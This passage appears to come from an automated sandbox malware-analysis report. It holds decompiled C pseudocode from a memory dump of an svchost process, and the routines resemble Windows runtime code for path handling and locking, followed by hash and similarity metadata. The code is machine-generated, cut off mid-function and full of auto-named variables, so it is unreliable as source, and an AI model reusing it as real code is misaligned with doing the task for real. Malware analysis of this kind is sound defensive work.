                                          						_t306 = 0x208;
                                          						_t298 = _t315;
                                          						_t316 = E03A46E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                          						if(_t316 == 0) {
                                          							L68:
                                          							_t322 = 0xc0000033;
                                          							goto L39;
                                          						} else {
                                          							while(_v581 == 0) {
                                          								_t233 = _v588;
                                          								if(_t316 > _t233) {
                                          									_t234 = _v548;
                                          									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                          										_t254 = L03A44620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                          										if(_t254 == 0) {
                                          											_t169 = 0xc0000017;
                                          										} else {
                                          											_t298 = _v564;
                                          											_v588 = _t316;
                                          											_t306 = _t316;
                                          											_t316 = E03A46E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                          											if(_t316 != 0) {
                                          												continue;
                                          											} else {
                                          												goto L68;
                                          											}
                                          										}
                                          									} else {
                                          										goto L90;
                                          									}
                                          								} else {
                                          									_v556 = _t316;
                                          									 *((short*)(_t329 + 0x32)) = _t233;
                                          									_v552 = _t254;
                                          									if(_t316 < 2) {
                                          										L11:
                                          										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                          											_t161 = 5;
                                          										} else {
                                          											if(_t316 < 6) {
                                          												L87:
                                          												_t161 = 3;
                                          											} else {
                                          												_t242 = _t254[2] & 0x0000ffff;
                                          												if(_t242 != 0x5c) {
                                          													if(_t242 == 0x2f) {
                                          														goto L16;
                                          													} else {
                                          														goto L87;
                                          													}
                                          													goto L101;
                                          												} else {
                                          													L16:
                                          													_t161 = 2;
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										_t243 =  *_t254 & 0x0000ffff;
                                          										if(_t243 == 0x5c || _t243 == 0x2f) {
                                          											if(_t316 < 4) {
                                          												L81:
                                          												_t161 = 4;
                                          												goto L17;
                                          											} else {
                                          												_t244 = _t254[1] & 0x0000ffff;
                                          												if(_t244 != 0x5c) {
                                          													if(_t244 == 0x2f) {
                                          														goto L60;
                                          													} else {
                                          														goto L81;
                                          													}
                                          												} else {
                                          													L60:
                                          													if(_t316 < 6) {
                                          														L83:
                                          														_t161 = 1;
                                          														goto L17;
                                          													} else {
                                          														_t245 = _t254[2] & 0x0000ffff;
                                          														if(_t245 != 0x2e) {
                                          															if(_t245 == 0x3f) {
                                          																goto L62;
                                          															} else {
                                          																goto L83;
                                          															}
                                          														} else {
                                          															L62:
                                          															if(_t316 < 8) {
                                          																L85:
                                          																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                          																goto L17;
                                          															} else {
                                          																_t250 = _t254[3] & 0x0000ffff;
                                          																if(_t250 != 0x5c) {
                                          																	if(_t250 == 0x2f) {
                                          																		goto L64;
                                          																	} else {
                                          																		goto L85;
                                          																	}
                                          																} else {
                                          																	L64:
                                          																	_t161 = 6;
                                          																	goto L17;
                                          																}
                                          															}
                                          														}
                                          													}
                                          												}
                                          											}
                                          											goto L101;
                                          										} else {
                                          											goto L11;
                                          										}
                                          									}
                                          									L17:
                                          									if(_t161 != 2) {
                                          										_t162 = _t161 - 1;
                                          										if(_t162 > 5) {
                                          											goto L18;
                                          										} else {
                                          											switch( *((intOrPtr*)(_t162 * 4 +  &M03A445F8))) {
                                          												case 0:
                                          													_v568 = 0x3a01078;
                                          													__eax = 2;
                                          													goto L20;
                                          												case 1:
                                          													goto L18;
                                          												case 2:
                                          													_t163 = 4;
                                          													goto L19;
                                          											}
                                          										}
                                          										goto L41;
                                          									} else {
                                          										L18:
                                          										_t163 = 0;
                                          										L19:
                                          										_v568 = 0x3a011c4;
                                          									}
                                          									L20:
                                          									_v588 = _t163;
                                          									_v564 = _t163 + _t163;
                                          									_t306 =  *_v568 & 0x0000ffff;
                                          									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                          									_v576 = _t265;
                                          									if(_t265 > 0xfffe) {
                                          										L90:
                                          										_t322 = 0xc0000106;
                                          									} else {
                                          										if(_t321 != 0) {
                                          											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                          												if(_v580 != 0) {
                                          													goto L23;
                                          												} else {
                                          													_t322 = 0xc0000106;
                                          													goto L39;
                                          												}
                                          											} else {
                                          												_t177 = _t306;
                                          												goto L25;
                                          											}
                                          											goto L101;
                                          										} else {
                                          											if(_v580 == _t321) {
                                          												_t322 = 0xc000000d;
                                          											} else {
                                          												L23:
                                          												_t173 = L03A44620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                          												_t269 = _v592;
                                          												_t269[2] = _t173;
                                          												if(_t173 == 0) {
                                          													_t322 = 0xc0000017;
                                          												} else {
                                          													_t316 = _v556;
                                          													 *_t269 = 0;
                                          													_t321 = _t269;
                                          													_t269[1] = _v576;
                                          													_t177 =  *_v568 & 0x0000ffff;
                                          													L25:
                                          													_v580 = _t177;
                                          													if(_t177 == 0) {
                                          														L29:
                                          														_t307 =  *_t321 & 0x0000ffff;
                                          													} else {
                                          														_t290 =  *_t321 & 0x0000ffff;
                                          														_v576 = _t290;
                                          														_t310 = _t177 & 0x0000ffff;
                                          														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                          															_t307 =  *_t321 & 0xffff;
                                          														} else {
                                          															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                          															E03A6F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                          															_t329 = _t329 + 0xc;
                                          															_t311 = _v580;
                                          															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                          															 *_t321 = _t225;
                                          															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                          																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                          															}
                                          															goto L29;
                                          														}
                                          													}
                                          													_t271 = _v556 - _v588 + _v588;
                                          													_v580 = _t307;
                                          													_v576 = _t271;
                                          													if(_t271 != 0) {
                                          														_t308 = _t271 & 0x0000ffff;
                                          														_v588 = _t308;
                                          														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                          															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                          															E03A6F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                          															_t329 = _t329 + 0xc;
                                          															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                          															 *_t321 = _t213;
                                          															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                          																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                          															}
                                          														}
                                          													}
                                          													_t272 = _v560;
                                          													if(_t272 != 0) {
                                          														 *_t272 = _t321;
                                          													}
                                          													_t306 = 0;
                                          													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                          													_t275 = _v572;
                                          													if(_t275 != 0) {
                                          														_t306 =  *_t275;
                                          														if(_t306 != 0) {
                                          															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                          														}
                                          													}
                                          													_t181 = _v544;
                                          													if(_t181 != 0) {
                                          														 *_t181 = 0;
                                          														 *((intOrPtr*)(_t181 + 4)) = 0;
                                          														 *((intOrPtr*)(_t181 + 8)) = 0;
                                          														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                          														if(_v540 == 5) {
                                          															_t182 = E03A252A5(1);
                                          															_v588 = _t182;
                                          															if(_t182 == 0) {
                                          																E03A3EB70(1, 0x3b179a0);
                                          																goto L38;
                                          															} else {
                                          																_v560 = _t182 + 0xc;
                                          																_t185 = E03A3AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                          																if(_t185 == 0) {
                                          																	_t324 = _v588;
                                          																	goto L97;
                                          																} else {
                                          																	_t306 = _v544;
                                          																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                          																	 *(_t306 + 4) = _t282;
                                          																	_v576 = _t282;
                                          																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                          																	 *_t306 = _t325;
                                          																	if( *_t282 == 0x5c) {
                                          																		_t149 = _t325 - 2; // -2
                                          																		_t283 = _t149;
                                          																		 *_t306 = _t283;
                                          																		 *(_t306 + 4) = _v576 + 2;
                                          																		_t185 = _t283 & 0x0000ffff;
                                          																	}
                                          																	_t324 = _v588;
                                          																	 *(_t306 + 2) = _t185;
                                          																	if((_v548 & 0x00000002) == 0) {
                                          																		L97:
                                          																		asm("lock xadd [esi], eax");
                                          																		if((_t185 | 0xffffffff) == 0) {
                                          																			_push( *((intOrPtr*)(_t324 + 4)));
                                          																			E03A695D0();
                                          																			L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                          																		}
                                          																	} else {
                                          																		 *(_t306 + 0xc) = _t324;
                                          																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                          																	}
                                          																	goto L38;
                                          																}
                                          															}
                                          															goto L41;
                                          														}
                                          													}
                                          													L38:
                                          													_t322 = 0;
                                          												}
                                          											}
                                          										}
                                          									}
                                          									L39:
                                          									if(_t254 !=  &_v532) {
                                          										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                          									}
                                          									_t169 = _t322;
                                          								}
                                          								goto L41;
                                          							}
                                          							goto L68;
                                          						}
                                          					}
                                          					L41:
                                          					_pop(_t317);
                                          					_pop(_t323);
                                          					_pop(_t255);
                                          					return E03A6B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                          				} else {
                                          					_t299 = __edx[2];
                                          					if( *_t299 == 0x5c) {
                                          						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                          						if(_t256 != 0x5c) {
                                          							if(_t256 != 0x3f) {
                                          								goto L2;
                                          							} else {
                                          								goto L50;
                                          							}
                                          						} else {
                                          							L50:
                                          							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                          								goto L2;
                                          							} else {
                                          								_t251 = E03A63D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                          								_pop(_t319);
                                          								_pop(_t326);
                                          								_pop(_t257);
                                          								return E03A6B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                          							}
                                          						}
                                          					} else {
                                          						L2:
                                          						_t260 = _v572;
                                          						goto L3;
                                          					}
                                          				}
                                          				L101:
                                          			}
                                          0x00000000
                                          0x03a4455d
                                          0x03a4450f
                                          0x00000000
                                          0x03a444f3
                                          0x03a443ff
                                          0x03a44405
                                          0x03a44405
                                          0x03a44405
                                          0x03a442ac
                                          0x03a4428c
                                          0x03a44282
                                          0x03a44407
                                          0x03a4440d
                                          0x03a8e2af
                                          0x03a8e2af
                                          0x03a44413
                                          0x03a44413
                                          0x00000000
                                          0x03a441d4
                                          0x00000000
                                          0x03a441c3
                                          0x03a441bd
                                          0x03a44415
                                          0x03a44415
                                          0x03a44416
                                          0x03a44417
                                          0x03a44429
                                          0x03a4416e
                                          0x03a4416e
                                          0x03a44175
                                          0x03a44498
                                          0x03a4449f
                                          0x03a8e12d
                                          0x00000000
                                          0x03a8e133
                                          0x00000000
                                          0x03a8e133
                                          0x03a444a5
                                          0x03a444a5
                                          0x03a444aa
                                          0x00000000
                                          0x03a444bb
                                          0x03a444ca
                                          0x03a444d6
                                          0x03a444d7
                                          0x03a444d8
                                          0x03a444e3
                                          0x03a444e3
                                          0x03a444aa
                                          0x03a4417b
                                          0x03a4417b
                                          0x03a4417b
                                          0x00000000
                                          0x03a4417b
                                          0x03a44175
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad99d7cf8c44aa6b3d40f73bca122cf50c33c4e364333df0266ed1e388f93748
                                          • Instruction ID: 7ff6fccebcd9651ba72272ad4c722d805a0813f458946943bff0d4041db2e8f6
                                          • Opcode Fuzzy Hash: ad99d7cf8c44aa6b3d40f73bca122cf50c33c4e364333df0266ed1e388f93748
                                          • Instruction Fuzzy Hash: D5F15A74608251CBCB28DF1AC480B3AB7E5AF99714F58496FF8868B290E734D895CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E03A520A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed char _v24;
                                          				intOrPtr _v28;
                                          				signed int _v32;
                                          				void* _v36;
                                          				char _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				unsigned int _v60;
                                          				char _v64;
                                          				unsigned int _v68;
                                          				signed int _v72;
                                          				char _v73;
                                          				signed int _v74;
                                          				char _v75;
                                          				signed int _v76;
                                          				void* _v81;
                                          				void* _v82;
                                          				void* _v89;
                                          				void* _v92;
                                          				void* _v97;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed char _t128;
                                          				void* _t129;
                                          				signed int _t130;
                                          				void* _t132;
                                          				signed char _t133;
                                          				intOrPtr _t135;
                                          				signed int _t137;
                                          				signed int _t140;
                                          				signed int* _t144;
                                          				signed int* _t145;
                                          				intOrPtr _t146;
                                          				signed int _t147;
                                          				signed char* _t148;
                                          				signed int _t149;
                                          				signed int _t153;
                                          				signed int _t169;
                                          				signed int _t174;
                                          				signed int _t180;
                                          				void* _t197;
                                          				void* _t198;
                                          				signed int _t201;
                                          				intOrPtr* _t202;
                                          				intOrPtr* _t205;
                                          				signed int _t210;
                                          				signed int _t215;
                                          				signed int _t218;
                                          				signed char _t221;
                                          				signed int _t226;
                                          				char _t227;
                                          				signed int _t228;
                                          				void* _t229;
                                          				unsigned int _t231;
                                          				void* _t235;
                                          				signed int _t240;
                                          				signed int _t241;
                                          				void* _t242;
                                          				signed int _t246;
                                          				signed int _t248;
                                          				signed int _t252;
                                          				signed int _t253;
                                          				void* _t254;
                                          				intOrPtr* _t256;
                                          				intOrPtr _t257;
                                          				unsigned int _t262;
                                          				signed int _t265;
                                          				void* _t267;
                                          				signed int _t275;
                                          
                                          				_t198 = __ebx;
                                          				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                          				_v68 = __ecx;
                                          				_v73 = 0;
                                          				_t201 = __edx & 0x00002000;
                                          				_t128 = __edx & 0xffffdfff;
                                          				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                          				_v72 = _t128;
                                          				if((_t128 & 0x00000008) != 0) {
                                          					__eflags = _t128 - 8;
                                          					if(_t128 != 8) {
                                          						L69:
                                          						_t129 = 0xc000000d;
                                          						goto L23;
                                          					} else {
                                          						_t130 = 0;
                                          						_v72 = 0;
                                          						_v75 = 1;
                                          						L2:
                                          						_v74 = 1;
                                          						_t226 =  *0x3b18714; // 0x0
                                          						if(_t226 != 0) {
                                          							__eflags = _t201;
                                          							if(_t201 != 0) {
                                          								L62:
                                          								_v74 = 1;
                                          								L63:
                                          								_t130 = _t226 & 0xffffdfff;
                                          								_v72 = _t130;
                                          								goto L3;
                                          							}
                                          							_v74 = _t201;
                                          							__eflags = _t226 & 0x00002000;
                                          							if((_t226 & 0x00002000) == 0) {
                                          								goto L63;
                                          							}
                                          							goto L62;
                                          						}
                                          						L3:
                                          						_t227 = _v75;
                                          						L4:
                                          						_t240 = 0;
                                          						_v56 = 0;
                                          						_t252 = _t130 & 0x00000100;
                                          						if(_t252 != 0 || _t227 != 0) {
                                          							_t240 = _v68;
                                          							_t132 = E03A52EB0(_t240);
                                          							__eflags = _t132 - 2;
                                          							if(_t132 != 2) {
                                          								__eflags = _t132 - 1;
                                          								if(_t132 == 1) {
                                          									goto L25;
                                          								}
                                          								__eflags = _t132 - 6;
                                          								if(_t132 == 6) {
                                          									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                          									if( *((short*)(_t240 + 4)) != 0x3f) {
                                          										goto L40;
                                          									}
                                          									_t197 = E03A52EB0(_t240 + 8);
                                          									__eflags = _t197 - 2;
                                          									if(_t197 == 2) {
                                          										goto L25;
                                          									}
                                          								}
                                          								L40:
                                          								_t133 = 1;
                                          								L26:
                                          								_t228 = _v75;
                                          								_v56 = _t240;
                                          								__eflags = _t133;
                                          								if(_t133 != 0) {
                                          									__eflags = _t228;
                                          									if(_t228 == 0) {
                                          										L43:
                                          										__eflags = _v72;
                                          										if(_v72 == 0) {
                                          											goto L8;
                                          										}
                                          										goto L69;
                                          									}
                                          									_t133 = E03A258EC(_t240);
                                          									_t221 =  *0x3b15cac; // 0x16
                                          									__eflags = _t221 & 0x00000040;
                                          									if((_t221 & 0x00000040) != 0) {
                                          										_t228 = 0;
                                          										__eflags = _t252;
                                          										if(_t252 != 0) {
                                          											goto L43;
                                          										}
                                          										_t133 = _v72;
                                          										goto L7;
                                          									}
                                          									goto L43;
                                          								} else {
                                          									_t133 = _v72;
                                          									goto L6;
                                          								}
                                          							}
                                          							L25:
                                          							_t133 = _v73;
                                          							goto L26;
                                          						} else {
                                          							L6:
                                          							_t221 =  *0x3b15cac; // 0x16
                                          							L7:
                                          							if(_t133 != 0) {
                                          								__eflags = _t133 & 0x00001000;
                                          								if((_t133 & 0x00001000) != 0) {
                                          									_t133 = _t133 | 0x00000a00;
                                          									__eflags = _t221 & 0x00000004;
                                          									if((_t221 & 0x00000004) != 0) {
                                          										_t133 = _t133 | 0x00000400;
                                          									}
                                          								}
                                          								__eflags = _t228;
                                          								if(_t228 != 0) {
                                          									_t133 = _t133 | 0x00000100;
                                          								}
                                          								_t229 = E03A64A2C(0x3b16e40, 0x3a64b30, _t133, _t240);
                                          								__eflags = _t229;
                                          								if(_t229 == 0) {
                                          									_t202 = _a20;
                                          									goto L100;
                                          								} else {
                                          									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                          									L15:
                                          									_t202 = _a20;
                                          									 *_t202 = _t135;
                                          									if(_t229 == 0) {
                                          										L100:
                                          										 *_a4 = 0;
                                          										_t137 = _a8;
                                          										__eflags = _t137;
                                          										if(_t137 != 0) {
                                          											 *_t137 = 0;
                                          										}
                                          										 *_t202 = 0;
                                          										_t129 = 0xc0000017;
                                          										goto L23;
                                          									} else {
                                          										_t242 = _a16;
                                          										if(_t242 != 0) {
                                          											_t254 = _t229;
                                          											memcpy(_t242, _t254, 0xd << 2);
                                          											_t267 = _t267 + 0xc;
                                          											_t242 = _t254 + 0x1a;
                                          										}
                                          										_t205 = _a4;
                                          										_t25 = _t229 + 0x48; // 0x48
                                          										 *_t205 = _t25;
                                          										_t140 = _a8;
                                          										if(_t140 != 0) {
                                          											__eflags =  *((char*)(_t267 + 0xa));
                                          											if( *((char*)(_t267 + 0xa)) != 0) {
                                          												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                          											} else {
                                          												 *_t140 = 0;
                                          											}
                                          										}
                                          										_t256 = _a12;
                                          										if(_t256 != 0) {
                                          											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                          										}
                                          										_t257 =  *_t205;
                                          										_v48 = 0;
                                          										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                          										_v56 = 0;
                                          										_v52 = 0;
                                          										_t144 =  *( *[fs:0x30] + 0x50);
                                          										if(_t144 != 0) {
                                          											__eflags =  *_t144;
                                          											if( *_t144 == 0) {
                                          												goto L20;
                                          											}
                                          											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                          											goto L21;
                                          										} else {
                                          											L20:
                                          											_t145 = 0x7ffe0384;
                                          											L21:
                                          											if( *_t145 != 0) {
                                          												_t146 =  *[fs:0x30];
                                          												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                          												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                          													_t147 = E03A47D50();
                                          													__eflags = _t147;
                                          													if(_t147 == 0) {
                                          														_t148 = 0x7ffe0385;
                                          													} else {
                                          														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                          													}
                                          													__eflags =  *_t148 & 0x00000020;
                                          													if(( *_t148 & 0x00000020) != 0) {
                                          														_t149 = _v72;
                                          														__eflags = _t149;
                                          														if(__eflags == 0) {
                                          															_t149 = 0x3a05c80;
                                          														}
                                          														_push(_t149);
                                          														_push( &_v48);
                                          														 *((char*)(_t267 + 0xb)) = E03A5F6E0(_t198, _t242, _t257, __eflags);
                                          														_push(_t257);
                                          														_push( &_v64);
                                          														_t153 = E03A5F6E0(_t198, _t242, _t257, __eflags);
                                          														__eflags =  *((char*)(_t267 + 0xb));
                                          														if( *((char*)(_t267 + 0xb)) != 0) {
                                          															__eflags = _t153;
                                          															if(_t153 != 0) {
                                          																__eflags = 0;
                                          																E03AA7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                          																L03A42400(_t267 + 0x20);
                                          															}
                                          															L03A42400( &_v64);
                                          														}
                                          													}
                                          												}
                                          											}
                                          											_t129 = 0;
                                          											L23:
                                          											return _t129;
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L8:
                                          							_t275 = _t240;
                                          							if(_t275 != 0) {
                                          								_v73 = 0;
                                          								_t253 = 0;
                                          								__eflags = 0;
                                          								L29:
                                          								_push(0);
                                          								_t241 = E03A52397(_t240);
                                          								__eflags = _t241;
                                          								if(_t241 == 0) {
                                          									_t229 = 0;
                                          									L14:
                                          									_t135 = 0;
                                          									goto L15;
                                          								}
                                          								__eflags =  *((char*)(_t267 + 0xb));
                                          								 *(_t241 + 0x34) = 1;
                                          								if( *((char*)(_t267 + 0xb)) != 0) {
                                          									E03A42280(_t134, 0x3b18608);
                                          									__eflags =  *0x3b16e48 - _t253; // 0x0
                                          									if(__eflags != 0) {
                                          										L48:
                                          										_t253 = 0;
                                          										__eflags = 0;
                                          										L49:
                                          										E03A3FFB0(_t198, _t241, 0x3b18608);
                                          										__eflags = _t253;
                                          										if(_t253 != 0) {
                                          											L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                          										}
                                          										goto L31;
                                          									}
                                          									 *0x3b16e48 = _t241;
                                          									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                          									__eflags = _t253;
                                          									if(_t253 != 0) {
                                          										_t57 = _t253 + 0x34;
                                          										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                          										__eflags =  *_t57;
                                          										if( *_t57 == 0) {
                                          											goto L49;
                                          										}
                                          									}
                                          									goto L48;
                                          								}
                                          								L31:
                                          								_t229 = _t241;
                                          								goto L14;
                                          							}
                                          							_v73 = 1;
                                          							_v64 = _t240;
                                          							asm("lock bts dword [esi], 0x0");
                                          							if(_t275 < 0) {
                                          								_t231 =  *0x3b18608; // 0x0
                                          								while(1) {
                                          									_v60 = _t231;
                                          									__eflags = _t231 & 0x00000001;
                                          									if((_t231 & 0x00000001) != 0) {
                                          										goto L76;
                                          									}
                                          									_t73 = _t231 + 1; // 0x1
                                          									_t210 = _t73;
                                          									asm("lock cmpxchg [edi], ecx");
                                          									__eflags = _t231 - _t231;
                                          									if(_t231 != _t231) {
                                          										L92:
                                          										_t133 = E03A56B90(_t210,  &_v64);
                                          										_t262 =  *0x3b18608; // 0x0
                                          										L93:
                                          										_t231 = _t262;
                                          										continue;
                                          									}
                                          									_t240 = _v56;
                                          									goto L10;
                                          									L76:
                                          									_t169 = E03A5E180(_t133);
                                          									__eflags = _t169;
                                          									if(_t169 != 0) {
                                          										_push(0xc000004b);
                                          										_push(0xffffffff);
                                          										E03A697C0();
                                          										_t231 = _v68;
                                          									}
                                          									_v72 = 0;
                                          									_v24 =  *( *[fs:0x18] + 0x24);
                                          									_v16 = 3;
                                          									_v28 = 0;
                                          									__eflags = _t231 & 0x00000002;
                                          									if((_t231 & 0x00000002) == 0) {
                                          										_v32 =  &_v36;
                                          										_t174 = _t231 >> 4;
                                          										__eflags = 1 - _t174;
                                          										_v20 = _t174;
                                          										asm("sbb ecx, ecx");
                                          										_t210 = 3 |  &_v36;
                                          										__eflags = _t174;
                                          										if(_t174 == 0) {
                                          											_v20 = 0xfffffffe;
                                          										}
                                          									} else {
                                          										_v32 = 0;
                                          										_v20 = 0xffffffff;
                                          										_v36 = _t231 & 0xfffffff0;
                                          										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                          										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                          									}
                                          									asm("lock cmpxchg [edi], esi");
                                          									_t262 = _t231;
                                          									__eflags = _t262 - _t231;
                                          									if(_t262 != _t231) {
                                          										goto L92;
                                          									} else {
                                          										__eflags = _v72;
                                          										if(_v72 != 0) {
                                          											E03A6006A(0x3b18608, _t210);
                                          										}
                                          										__eflags =  *0x7ffe036a - 1;
                                          										if(__eflags <= 0) {
                                          											L89:
                                          											_t133 =  &_v16;
                                          											asm("lock btr dword [eax], 0x1");
                                          											if(__eflags >= 0) {
                                          												goto L93;
                                          											} else {
                                          												goto L90;
                                          											}
                                          											do {
                                          												L90:
                                          												_push(0);
                                          												_push(0x3b18608);
                                          												E03A6B180();
                                          												_t133 = _v24;
                                          												__eflags = _t133 & 0x00000004;
                                          											} while ((_t133 & 0x00000004) == 0);
                                          											goto L93;
                                          										} else {
                                          											_t218 =  *0x3b16904; // 0x400
                                          											__eflags = _t218;
                                          											if(__eflags == 0) {
                                          												goto L89;
                                          											} else {
                                          												goto L87;
                                          											}
                                          											while(1) {
                                          												L87:
                                          												__eflags = _v16 & 0x00000002;
                                          												if(__eflags == 0) {
                                          													goto L89;
                                          												}
                                          												asm("pause");
                                          												_t218 = _t218 - 1;
                                          												__eflags = _t218;
                                          												if(__eflags != 0) {
                                          													continue;
                                          												}
                                          												goto L89;
                                          											}
                                          											goto L89;
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L10:
                                          							_t229 =  *0x3b16e48; // 0x0
                                          							_v72 = _t229;
                                          							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                          								E03A3FFB0(_t198, _t240, 0x3b18608);
                                          								_t253 = _v76;
                                          								goto L29;
                                          							} else {
                                          								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                          								asm("lock cmpxchg [esi], ecx");
                                          								_t215 = 1;
                                          								if(1 != 1) {
                                          									while(1) {
                                          										_t246 = _t215 & 0x00000006;
                                          										_t180 = _t215;
                                          										__eflags = _t246 - 2;
                                          										_v56 = _t246;
                                          										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                          										asm("lock cmpxchg [edi], esi");
                                          										_t248 = _v56;
                                          										__eflags = _t180 - _t215;
                                          										if(_t180 == _t215) {
                                          											break;
                                          										}
                                          										_t215 = _t180;
                                          									}
                                          									__eflags = _t248 - 2;
                                          									if(_t248 == 2) {
                                          										__eflags = 0;
                                          										E03A600C2(0x3b18608, 0, _t235);
                                          									}
                                          									_t229 = _v72;
                                          								}
                                          								goto L14;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t227 = 0;
                                          				_v75 = 0;
                                          				if(_t128 != 0) {
                                          					goto L4;
                                          				}
                                          				goto L2;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4ec9d10f638bad7222c7ae4adac26cefbca722a3a62e446b4bb5714074ac20b
                                          • Instruction ID: eea943791643ba1440c39cdca5acaf36367d83f590f39019c31c3cf4d2a01df8
                                          • Opcode Fuzzy Hash: b4ec9d10f638bad7222c7ae4adac26cefbca722a3a62e446b4bb5714074ac20b
                                          • Instruction Fuzzy Hash: 71F1C335A083459FEB26CB28C54176BB7E9BF86324F08896FFC959B250D734D841CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E03A3D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				signed int _v36;
                                          				intOrPtr* _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed char _v52;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v100;
                                          				intOrPtr _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				intOrPtr _v120;
                                          				signed int _v132;
                                          				char _v140;
                                          				char _v144;
                                          				char _v157;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v169;
                                          				intOrPtr _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				intOrPtr _v188;
                                          				signed int _v192;
                                          				signed int _v200;
                                          				signed int _v208;
                                          				intOrPtr* _v212;
                                          				char _v216;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
